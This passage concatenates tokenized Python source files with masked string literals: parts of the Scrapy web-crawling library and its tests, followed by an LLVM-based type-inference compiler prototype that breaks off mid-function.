meta [ '<STR_LIT>' ] ] <EOL> return self . _parse_response ( response , rule . callback , rule . cb_kwargs , rule . follow ) <EOL> def _parse_response ( self , response , callback , cb_kwargs , follow = True ) : <EOL> if callback : <EOL> cb_res = callback ( response , ** cb_kwargs ) or ( ) <EOL> cb_res = self . process_results ( response , cb_res ) <EOL> for requests_or_item in iterate_spider_output ( cb_res ) : <EOL> yield requests_or_item <EOL> if follow and self . _follow_links : <EOL> for request_or_item in self . _requests_to_follow ( response ) : <EOL> yield request_or_item <EOL> def _compile_rules ( self ) : <EOL> def get_method ( method ) : <EOL> if callable ( method ) : <EOL> return method <EOL> elif isinstance ( method , six . string_types ) : <EOL> return getattr ( self , method , None ) <EOL> self . _rules = [ copy . copy ( r ) for r in self . rules ] <EOL> for rule in self . _rules : <EOL> rule . callback = get_method ( rule . callback ) <EOL> rule . process_links = get_method ( rule . process_links ) <EOL> rule . process_request = get_method ( rule . process_request ) <EOL> @ classmethod <EOL> def from_crawler ( cls , crawler , * args , ** kwargs ) : <EOL> spider = super ( CrawlSpider , cls ) . from_crawler ( crawler , * args , ** kwargs ) <EOL> spider . _follow_links = crawler . settings . getbool ( <EOL> '<STR_LIT>' , True ) <EOL> return spider <EOL> def set_crawler ( self , crawler ) : <EOL> super ( CrawlSpider , self ) . set_crawler ( crawler ) <EOL> self . _follow_links = crawler . settings . getbool ( '<STR_LIT>' , True ) </s>
<s> """<STR_LIT>""" <EOL> from w3lib . html import * </s>
<s> from os . path import dirname , join <EOL> from setuptools import setup , find_packages <EOL> with open ( join ( dirname ( __file__ ) , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as f : <EOL> version = f . read ( ) . decode ( '<STR_LIT:ascii>' ) . strip ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from io import BytesIO <EOL> from unittest import TestCase <EOL> from os . path import join , abspath , dirname <EOL> from gzip import GzipFile <EOL> from scrapy . spiders import Spider <EOL> from scrapy . http import Response , Request , HtmlResponse <EOL> from scrapy . downloadermiddlewares . httpcompression import HttpCompressionMiddleware <EOL> from tests import tests_datadir <EOL> from w3lib . encoding import resolve_encoding <EOL> SAMPLEDIR = join ( tests_datadir , '<STR_LIT>' ) <EOL> FORMAT = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> class HttpCompressionTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . spider = Spider ( '<STR_LIT:foo>' ) <EOL> self . mw = HttpCompressionMiddleware ( ) <EOL> def _getresponse ( self , coding ) : <EOL> if coding not in FORMAT : <EOL> raise ValueError ( ) <EOL> samplefile , contentencoding = FORMAT [ coding ] <EOL> with open ( join ( SAMPLEDIR , samplefile ) , '<STR_LIT:rb>' ) as sample : <EOL> body = sample . read ( ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : len ( body ) , <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : contentencoding , <EOL> } <EOL> response = Response ( '<STR_LIT>' , body = body , headers = headers ) <EOL> response . request = Request ( '<STR_LIT>' , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return response <EOL> def test_process_request ( self ) : <EOL> request = Request ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in request . headers <EOL> self . mw . process_request ( request , self . spider ) <EOL> self . assertEqual ( request . headers . get ( '<STR_LIT>' ) , b'<STR_LIT>' ) <EOL> def test_process_response_gzip ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> request = response . request <EOL> self . 
assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in newresponse . headers <EOL> def test_process_response_rawdeflate ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> request = response . request <EOL> self . assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in newresponse . headers <EOL> def test_process_response_zlibdelate ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> request = response . request <EOL> self . assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in newresponse . headers <EOL> def test_process_response_plain ( self ) : <EOL> response = Response ( '<STR_LIT>' , body = b'<STR_LIT>' ) <EOL> request = Request ( '<STR_LIT>' ) <EOL> assert not response . headers . get ( '<STR_LIT>' ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is response <EOL> assert newresponse . body . startswith ( b'<STR_LIT>' ) <EOL> def test_multipleencodings ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> response . headers [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> request = response . request <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert newresponse is not response <EOL> self . 
assertEqual ( newresponse . headers . getlist ( '<STR_LIT>' ) , [ b'<STR_LIT>' ] ) <EOL> def test_process_response_encoding_inside_body ( self ) : <EOL> headers = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> f = BytesIO ( ) <EOL> plainbody = b"""<STR_LIT>""" <EOL> zf = GzipFile ( fileobj = f , mode = '<STR_LIT:wb>' ) <EOL> zf . write ( plainbody ) <EOL> zf . close ( ) <EOL> response = Response ( "<STR_LIT>" , headers = headers , body = f . getvalue ( ) ) <EOL> request = Request ( "<STR_LIT>" ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert isinstance ( newresponse , HtmlResponse ) <EOL> self . assertEqual ( newresponse . body , plainbody ) <EOL> self . assertEqual ( newresponse . encoding , resolve_encoding ( '<STR_LIT>' ) ) <EOL> def test_process_response_force_recalculate_encoding ( self ) : <EOL> headers = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> f = BytesIO ( ) <EOL> plainbody = b"""<STR_LIT>""" <EOL> zf = GzipFile ( fileobj = f , mode = '<STR_LIT:wb>' ) <EOL> zf . write ( plainbody ) <EOL> zf . close ( ) <EOL> response = HtmlResponse ( "<STR_LIT>" , headers = headers , body = f . getvalue ( ) ) <EOL> request = Request ( "<STR_LIT>" ) <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> assert isinstance ( newresponse , HtmlResponse ) <EOL> self . assertEqual ( newresponse . body , plainbody ) <EOL> self . assertEqual ( newresponse . encoding , resolve_encoding ( '<STR_LIT>' ) ) <EOL> def test_process_response_gzipped_contenttype ( self ) : <EOL> response = self . _getresponse ( '<STR_LIT>' ) <EOL> response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> request = response . request <EOL> newresponse = self . mw . process_response ( request , response , self . spider ) <EOL> self . assertIs ( newresponse , response ) <EOL> self . 
assertEqual ( response . headers [ '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . assertEqual ( response . headers [ '<STR_LIT:Content-Type>' ] , b'<STR_LIT>' ) </s>
<s> import unittest <EOL> from six . moves . urllib . parse import urlparse <EOL> from scrapy . http import Request <EOL> from scrapy . utils . httpobj import urlparse_cached <EOL> class HttpobjUtilsTest ( unittest . TestCase ) : <EOL> def test_urlparse_cached ( self ) : <EOL> url = "<STR_LIT>" <EOL> request1 = Request ( url ) <EOL> request2 = Request ( url ) <EOL> req1a = urlparse_cached ( request1 ) <EOL> req1b = urlparse_cached ( request1 ) <EOL> req2 = urlparse_cached ( request2 ) <EOL> urlp = urlparse ( url ) <EOL> assert req1a == req2 <EOL> assert req1a == urlp <EOL> assert req1a is req1b <EOL> assert req1a is not req2 <EOL> assert req1a is not req2 <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from base64 import urlsafe_b64encode <EOL> def headers_raw_to_dict ( headers_raw ) : <EOL> r"""<STR_LIT>""" <EOL> if headers_raw is None : <EOL> return None <EOL> headers = headers_raw . splitlines ( ) <EOL> headers_tuples = [ header . split ( b'<STR_LIT::>' , <NUM_LIT:1> ) for header in headers ] <EOL> return dict ( [ <EOL> ( header_item [ <NUM_LIT:0> ] . strip ( ) , [ header_item [ <NUM_LIT:1> ] . strip ( ) ] ) <EOL> for header_item in headers_tuples <EOL> if len ( header_item ) == <NUM_LIT:2> <EOL> ] ) <EOL> def headers_dict_to_raw ( headers_dict ) : <EOL> r"""<STR_LIT>""" <EOL> if headers_dict is None : <EOL> return None <EOL> raw_lines = [ ] <EOL> for key , value in headers_dict . items ( ) : <EOL> if isinstance ( value , bytes ) : <EOL> raw_lines . append ( b"<STR_LIT>" . join ( [ key , value ] ) ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> for v in value : <EOL> raw_lines . append ( b"<STR_LIT>" . join ( [ key , v ] ) ) <EOL> return b'<STR_LIT:\r\n>' . join ( raw_lines ) <EOL> def basic_auth_header ( username , password ) : <EOL> """<STR_LIT>""" <EOL> auth = "<STR_LIT>" % ( username , password ) <EOL> if not isinstance ( auth , bytes ) : <EOL> auth = auth . encode ( '<STR_LIT>' ) <EOL> return b'<STR_LIT>' + urlsafe_b64encode ( auth ) </s>
<s> from __future__ import print_function <EOL> import sys <EOL> import ast <EOL> import types <EOL> import ctypes <EOL> import inspect <EOL> import pprint <EOL> import string <EOL> import numpy as np <EOL> from itertools import tee , izip <EOL> from textwrap import dedent <EOL> from collections import deque , defaultdict <EOL> import llvm . core as lc <EOL> import llvm . passes as lp <EOL> import llvm . ee as le <EOL> from llvm . core import Module , Builder , Function , Type , Constant <EOL> DEBUG = False <EOL> class Var ( ast . AST ) : <EOL> _fields = [ "<STR_LIT:id>" , "<STR_LIT:type>" ] <EOL> def __init__ ( self , id , type = None ) : <EOL> self . id = id <EOL> self . type = type <EOL> class Assign ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:type>" ] <EOL> def __init__ ( self , ref , val , type = None ) : <EOL> self . ref = ref <EOL> self . val = val <EOL> self . type = type <EOL> class Return ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" ] <EOL> def __init__ ( self , val ) : <EOL> self . val = val <EOL> class Loop ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:end>" , "<STR_LIT:body>" ] <EOL> def __init__ ( self , var , begin , end , body ) : <EOL> self . var = var <EOL> self . begin = begin <EOL> self . end = end <EOL> self . body = body <EOL> class App ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT:args>" ] <EOL> def __init__ ( self , fn , args ) : <EOL> self . fn = fn <EOL> self . args = args <EOL> class Fun ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT:args>" , "<STR_LIT:body>" ] <EOL> def __init__ ( self , fname , args , body ) : <EOL> self . fname = fname <EOL> self . args = args <EOL> self . body = body <EOL> class LitInt ( ast . AST ) : <EOL> _fields = [ "<STR_LIT:n>" ] <EOL> def __init__ ( self , n , type = None ) : <EOL> self . n = n <EOL> self . type = type <EOL> class LitFloat ( ast . 
AST ) : <EOL> _fields = [ "<STR_LIT:n>" ] <EOL> def __init__ ( self , n , type = None ) : <EOL> self . n = n <EOL> self . type = None <EOL> class LitBool ( ast . AST ) : <EOL> _fields = [ "<STR_LIT:n>" ] <EOL> def __init__ ( self , n ) : <EOL> self . n = n <EOL> class Prim ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT:args>" ] <EOL> def __init__ ( self , fn , args ) : <EOL> self . fn = fn <EOL> self . args = args <EOL> class Index ( ast . AST ) : <EOL> _fields = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def __init__ ( self , val , ix ) : <EOL> self . val = val <EOL> self . ix = ix <EOL> class Noop ( ast . AST ) : <EOL> _fields = [ ] <EOL> primops = { ast . Add : "<STR_LIT>" , ast . Mult : "<STR_LIT>" } <EOL> class TVar ( object ) : <EOL> def __init__ ( self , s ) : <EOL> self . s = s <EOL> def __hash__ ( self ) : <EOL> return hash ( self . s ) <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TVar ) : <EOL> return ( self . s == other . s ) <EOL> else : <EOL> return False <EOL> def __str__ ( self ) : <EOL> return self . s <EOL> class TCon ( object ) : <EOL> def __init__ ( self , s ) : <EOL> self . s = s <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TCon ) : <EOL> return ( self . s == other . s ) <EOL> else : <EOL> return False <EOL> def __hash__ ( self ) : <EOL> return hash ( self . s ) <EOL> def __str__ ( self ) : <EOL> return self . s <EOL> class TApp ( object ) : <EOL> def __init__ ( self , a , b ) : <EOL> self . a = a <EOL> self . b = b <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TApp ) : <EOL> return ( self . a == other . a ) & ( self . b == other . b ) <EOL> else : <EOL> return False <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . a , self . b ) ) <EOL> def __str__ ( self ) : <EOL> return str ( self . a ) + "<STR_LIT:U+0020>" + str ( self . b ) <EOL> class TFun ( object ) : <EOL> def __init__ ( self , argtys , retty ) : <EOL> assert isinstance ( argtys , list ) <EOL> self . 
argtys = argtys <EOL> self . retty = retty <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , TFun ) : <EOL> return ( self . argtys == other . argtys ) & ( self . retty == other . retty ) <EOL> else : <EOL> return False <EOL> def __str__ ( self ) : <EOL> return str ( self . argtys ) + "<STR_LIT>" + str ( self . retty ) <EOL> def ftv ( x ) : <EOL> if isinstance ( x , TCon ) : <EOL> return set ( ) <EOL> elif isinstance ( x , TApp ) : <EOL> return ftv ( x . a ) | ftv ( x . b ) <EOL> elif isinstance ( x , TFun ) : <EOL> return reduce ( set . union , map ( ftv , x . argtys ) ) | ftv ( x . retty ) <EOL> elif isinstance ( x , TVar ) : <EOL> return set ( [ x ] ) <EOL> def is_array ( ty ) : <EOL> return isinstance ( ty , TApp ) and ty . a == TCon ( "<STR_LIT>" ) <EOL> int32 = TCon ( "<STR_LIT>" ) <EOL> int64 = TCon ( "<STR_LIT>" ) <EOL> float32 = TCon ( "<STR_LIT>" ) <EOL> double64 = TCon ( "<STR_LIT>" ) <EOL> void = TCon ( "<STR_LIT>" ) <EOL> array = lambda t : TApp ( TCon ( "<STR_LIT>" ) , t ) <EOL> array_int32 = array ( int32 ) <EOL> array_int64 = array ( int64 ) <EOL> array_double64 = array ( double64 ) <EOL> def naming ( ) : <EOL> k = <NUM_LIT:0> <EOL> while True : <EOL> for a in string . ascii_lowercase : <EOL> yield ( "<STR_LIT:'>" + a + str ( k ) ) if ( k > <NUM_LIT:0> ) else ( a ) <EOL> k = k + <NUM_LIT:1> <EOL> class TypeInfer ( object ) : <EOL> def __init__ ( self ) : <EOL> self . constraints = [ ] <EOL> self . env = { } <EOL> self . names = naming ( ) <EOL> def fresh ( self ) : <EOL> return TVar ( '<STR_LIT:$>' + next ( self . names ) ) <EOL> def visit ( self , node ) : <EOL> name = "<STR_LIT>" % type ( node ) . __name__ <EOL> if hasattr ( self , name ) : <EOL> return getattr ( self , name ) ( node ) <EOL> else : <EOL> return self . generic_visit ( node ) <EOL> def visit_Fun ( self , node ) : <EOL> arity = len ( node . args ) <EOL> self . argtys = [ self . fresh ( ) for v in node . args ] <EOL> self . 
retty = TVar ( "<STR_LIT>" ) <EOL> for ( arg , ty ) in zip ( node . args , self . argtys ) : <EOL> arg . type = ty <EOL> self . env [ arg . id ] = ty <EOL> map ( self . visit , node . body ) <EOL> return TFun ( self . argtys , self . retty ) <EOL> def visit_Noop ( self , node ) : <EOL> return None <EOL> def visit_LitInt ( self , node ) : <EOL> tv = self . fresh ( ) <EOL> node . type = tv <EOL> return tv <EOL> def visit_LitFloat ( self , node ) : <EOL> tv = self . fresh ( ) <EOL> node . type = tv <EOL> return tv <EOL> def visit_Assign ( self , node ) : <EOL> ty = self . visit ( node . val ) <EOL> if node . ref in self . env : <EOL> self . constraints += [ ( ty , self . env [ node . ref ] ) ] <EOL> self . env [ node . ref ] = ty <EOL> node . type = ty <EOL> return None <EOL> def visit_Index ( self , node ) : <EOL> tv = self . fresh ( ) <EOL> ty = self . visit ( node . val ) <EOL> ixty = self . visit ( node . ix ) <EOL> self . constraints += [ ( ty , array ( tv ) ) , ( ixty , int32 ) ] <EOL> return tv <EOL> def visit_Prim ( self , node ) : <EOL> if node . fn == "<STR_LIT>" : <EOL> return array ( int32 ) <EOL> elif node . fn == "<STR_LIT>" : <EOL> tya = self . visit ( node . args [ <NUM_LIT:0> ] ) <EOL> tyb = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> self . constraints += [ ( tya , tyb ) ] <EOL> return tyb <EOL> elif node . fn == "<STR_LIT>" : <EOL> tya = self . visit ( node . args [ <NUM_LIT:0> ] ) <EOL> tyb = self . visit ( node . args [ <NUM_LIT:1> ] ) <EOL> self . constraints += [ ( tya , tyb ) ] <EOL> return tyb <EOL> else : <EOL> raise NotImplementedError <EOL> def visit_Var ( self , node ) : <EOL> ty = self . env [ node . id ] <EOL> node . type = ty <EOL> return ty <EOL> def visit_Return ( self , node ) : <EOL> ty = self . visit ( node . val ) <EOL> self . constraints += [ ( ty , self . retty ) ] <EOL> def visit_Loop ( self , node ) : <EOL> self . env [ node . var . id ] = int32 <EOL> varty = self . visit ( node . var ) <EOL> begin = self . 
visit ( node . begin ) <EOL> end = self . visit ( node . end ) <EOL> self . constraints += [ ( varty , int32 ) , ( <EOL> begin , int64 ) , ( end , int32 ) ] <EOL> map ( self . visit , node . body ) <EOL> def generic_visit ( self , node ) : <EOL> raise NotImplementedError <EOL> class UnderDeteremined ( Exception ) : <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" <EOL> class InferError ( Exception ) : <EOL> def __init__ ( self , ty1 , ty2 ) : <EOL> self . ty1 = ty1 <EOL> self . ty2 = ty2 <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT:\n>' . join ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:\t>" + str ( self . ty1 ) , <EOL> "<STR_LIT>" , "<STR_LIT:\t>" + str ( self . ty2 ) <EOL> ] ) <EOL> def empty ( ) : <EOL> return { } <EOL> def apply ( s , t ) : <EOL> if isinstance ( t , TCon ) : <EOL> return t <EOL> elif isinstance ( t , TApp ) : <EOL> return TApp ( apply ( s , t . a ) , apply ( s , t . b ) ) <EOL> elif isinstance ( t , TFun ) : <EOL> argtys = [ apply ( s , a ) for a in t . argtys ] <EOL> retty = apply ( s , t . retty ) <EOL> return TFun ( argtys , retty ) <EOL> elif isinstance ( t , TVar ) : <EOL> return s . get ( t . s , t ) <EOL> def applyList ( s , xs ) : <EOL> return [ ( apply ( s , x ) , apply ( s , y ) ) for ( x , y ) in xs ] <EOL> def unify ( x , y ) : <EOL> if isinstance ( x , TApp ) and isinstance ( y , TApp ) : <EOL> s1 = unify ( x . a , y . a ) <EOL> s2 = unify ( apply ( s1 , x . b ) , apply ( s1 , y . b ) ) <EOL> return compose ( s2 , s1 ) <EOL> elif isinstance ( x , TCon ) and isinstance ( y , TCon ) and ( x == y ) : <EOL> return empty ( ) <EOL> elif isinstance ( x , TFun ) and isinstance ( y , TFun ) : <EOL> if len ( x . argtys ) != len ( y . argtys ) : <EOL> return Exception ( "<STR_LIT>" ) <EOL> s1 = solve ( zip ( x . argtys , y . argtys ) ) <EOL> s2 = unify ( apply ( s1 , x . retty ) , apply ( s1 , y . retty ) ) <EOL> return compose ( s2 , s1 ) <EOL> elif isinstance ( x , TVar ) : <EOL> return bind ( x . 
s , y ) <EOL> elif isinstance ( y , TVar ) : <EOL> return bind ( y . s , x ) <EOL> else : <EOL> raise InferError ( x , y ) <EOL> def solve ( xs ) : <EOL> mgu = empty ( ) <EOL> cs = deque ( xs ) <EOL> while len ( cs ) : <EOL> ( a , b ) = cs . pop ( ) <EOL> s = unify ( a , b ) <EOL> mgu = compose ( s , mgu ) <EOL> cs = deque ( applyList ( s , cs ) ) <EOL> return mgu <EOL> def bind ( n , x ) : <EOL> if x == n : <EOL> return empty ( ) <EOL> elif occurs_check ( n , x ) : <EOL> raise InfiniteType ( n , x ) <EOL> else : <EOL> return dict ( [ ( n , x ) ] ) <EOL> def occurs_check ( n , x ) : <EOL> return n in ftv ( x ) <EOL> def union ( s1 , s2 ) : <EOL> nenv = s1 . copy ( ) <EOL> nenv . update ( s2 ) <EOL> return nenv <EOL> def compose ( s1 , s2 ) : <EOL> s3 = dict ( ( t , apply ( s1 , u ) ) for t , u in s2 . items ( ) ) <EOL> return union ( s1 , s3 ) <EOL> class PythonVisitor ( ast . NodeVisitor ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __call__ ( self , source ) : <EOL> if isinstance ( source , types . ModuleType ) : <EOL> source = dedent ( inspect . getsource ( source ) ) <EOL> if isinstance ( source , types . FunctionType ) : <EOL> source = dedent ( inspect . getsource ( source ) ) <EOL> if isinstance ( source , types . LambdaType ) : <EOL> source = dedent ( inspect . getsource ( source ) ) <EOL> elif isinstance ( source , ( str , unicode ) ) : <EOL> source = dedent ( source ) <EOL> else : <EOL> raise NotImplementedError <EOL> self . _source = source <EOL> self . _ast = ast . parse ( source ) <EOL> return self . visit ( self . _ast ) <EOL> def visit_Module ( self , node ) : <EOL> body = map ( self . visit , node . body ) <EOL> return body [ <NUM_LIT:0> ] <EOL> def visit_Name ( self , node ) : <EOL> return Var ( node . id ) <EOL> def visit_Num ( self , node ) : <EOL> if isinstance ( node . n , float ) : <EOL> return LitFloat ( node . n ) <EOL> else : <EOL> return LitInt ( node . n ) <EOL> def visit_Bool ( self , node ) : <EOL> return LitBool ( node . 
n ) <EOL> def visit_Call ( self , node ) : <EOL> name = self . visit ( node . func ) <EOL> args = map ( self . visit , node . args ) <EOL> keywords = map ( self . visit , node . keywords ) <EOL> return App ( name , args ) <EOL> def visit_BinOp ( self , node ) : <EOL> op_str = node . op . __class__ <EOL> a = self . visit ( node . left ) <EOL> b = self . visit ( node . right ) <EOL> opname = primops [ op_str ] <EOL> return Prim ( opname , [ a , b ] ) <EOL> def visit_Assign ( self , node ) : <EOL> targets = node . targets <EOL> assert len ( node . targets ) == <NUM_LIT:1> <EOL> var = node . targets [ <NUM_LIT:0> ] . id <EOL> val = self . visit ( node . value ) <EOL> return Assign ( var , val ) <EOL> def visit_FunctionDef ( self , node ) : <EOL> stmts = list ( node . body ) <EOL> stmts = map ( self . visit , stmts ) <EOL> args = map ( self . visit , node . args . args ) <EOL> res = Fun ( node . name , args , stmts ) <EOL> return res <EOL> def visit_Pass ( self , node ) : <EOL> return Noop ( ) <EOL> def visit_Return ( self , node ) : <EOL> val = self . visit ( node . value ) <EOL> return Return ( val ) <EOL> def visit_Attribute ( self , node ) : <EOL> if node . attr == "<STR_LIT>" : <EOL> val = self . visit ( node . value ) <EOL> return Prim ( "<STR_LIT>" , [ val ] ) <EOL> else : <EOL> raise NotImplementedError <EOL> def visit_Subscript ( self , node ) : <EOL> if isinstance ( node . ctx , ast . Load ) : <EOL> if node . slice : <EOL> val = self . visit ( node . value ) <EOL> ix = self . visit ( node . slice . value ) <EOL> return Index ( val , ix ) <EOL> elif isinstance ( node . ctx , ast . Store ) : <EOL> raise NotImplementedError <EOL> def visit_For ( self , node ) : <EOL> target = self . visit ( node . target ) <EOL> stmts = map ( self . visit , node . body ) <EOL> if node . iter . func . id in { "<STR_LIT>" , "<STR_LIT>" } : <EOL> args = map ( self . visit , node . iter . 
args ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return Loop ( target , LitInt ( <NUM_LIT:0> , type = int32 ) , args [ <NUM_LIT:0> ] , stmts ) <EOL> elif len ( args ) == <NUM_LIT:2> : <EOL> return Loop ( target , args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> ] , stmts ) <EOL> def visit_AugAssign ( self , node ) : <EOL> if isinstance ( node . op , ast . Add ) : <EOL> ref = node . target . id <EOL> value = self . visit ( node . value ) <EOL> return Assign ( ref , Prim ( "<STR_LIT>" , [ Var ( ref ) , value ] ) ) <EOL> if isinstance ( node . op , ast . Mul ) : <EOL> ref = node . target . id <EOL> value = self . visit ( node . value ) <EOL> return Assign ( ref , Prim ( "<STR_LIT>" , [ Var ( ref ) , value ] ) ) <EOL> else : <EOL> raise NotImplementedError <EOL> def generic_visit ( self , node ) : <EOL> raise NotImplementedError <EOL> def ast2tree ( node , include_attrs = True ) : <EOL> def _transform ( node ) : <EOL> if isinstance ( node , ast . AST ) : <EOL> fields = ( ( a , _transform ( b ) ) <EOL> for a , b in ast . iter_fields ( node ) ) <EOL> if include_attrs : <EOL> attrs = ( ( a , _transform ( getattr ( node , a ) ) ) <EOL> for a in node . _attributes <EOL> if hasattr ( node , a ) ) <EOL> return ( node . __class__ . __name__ , dict ( fields ) , dict ( attrs ) ) <EOL> return ( node . __class__ . __name__ , dict ( fields ) ) <EOL> elif isinstance ( node , list ) : <EOL> return [ _transform ( x ) for x in node ] <EOL> elif isinstance ( node , str ) : <EOL> return repr ( node ) <EOL> return node <EOL> if not isinstance ( node , ast . AST ) : <EOL> raise TypeError ( '<STR_LIT>' % node . __class__ . __name__ ) <EOL> return _transform ( node ) <EOL> def pformat_ast ( node , include_attrs = False , ** kws ) : <EOL> return pprint . pformat ( ast2tree ( node , include_attrs ) , ** kws ) <EOL> def dump ( node ) : <EOL> return pformat_ast ( node ) <EOL> pointer = Type . pointer <EOL> int_type = Type . 
int ( ) <EOL> float_type = Type . float ( ) <EOL> double_type = Type . double ( ) <EOL> bool_type = Type . int ( <NUM_LIT:1> ) <EOL> void_type = Type . void ( ) <EOL> void_ptr = pointer ( Type . int ( <NUM_LIT:8> ) ) <EOL> def array_type ( elt_type ) : <EOL> return Type . struct ( [ <EOL> pointer ( elt_type ) , <EOL> int_type , <EOL> pointer ( int_type ) , <EOL> ] , name = '<STR_LIT>' + str ( elt_type ) ) <EOL> int32_array = pointer ( array_type ( int_type ) ) <EOL> int64_array = pointer ( array_type ( Type . int ( <NUM_LIT:64> ) ) ) <EOL> double_array = pointer ( array_type ( double_type ) ) <EOL> lltypes_map = { <EOL> int32 : int_type , <EOL> int64 : int_type , <EOL> float32 : float_type , <EOL> double64 : double_type , <EOL> array_int32 : int32_array , <EOL> array_int64 : int64_array , <EOL> array_double64 : double_array <EOL> } <EOL> def to_lltype ( ptype ) : <EOL> return lltypes_map [ ptype ] <EOL> def determined ( ty ) : <EOL> return len ( ftv ( ty ) ) == <NUM_LIT:0> <EOL> class LLVMEmitter ( object ) : <EOL> def __init__ ( self , spec_types , retty , argtys ) : <EOL> self . function = None <EOL> self . builder = None <EOL> self . locals = { } <EOL> self . arrays = defaultdict ( dict ) <EOL> self . exit_block = None <EOL> self . spec_types = spec_types <EOL> self . retty = retty <EOL> self . argtys = argtys <EOL> def start_function ( self , name , module , rettype , argtypes ) : <EOL> func_type = lc . Type . function ( rettype , argtypes , False ) <EOL> function = lc . Function . new ( module , func_type , name ) <EOL> entry_block = function . append_basic_block ( "<STR_LIT>" ) <EOL> builder = lc . Builder . new ( entry_block ) <EOL> self . exit_block = function . append_basic_block ( "<STR_LIT>" ) <EOL> self . function = function <EOL> self . builder = builder <EOL> def end_function ( self ) : <EOL> self . builder . position_at_end 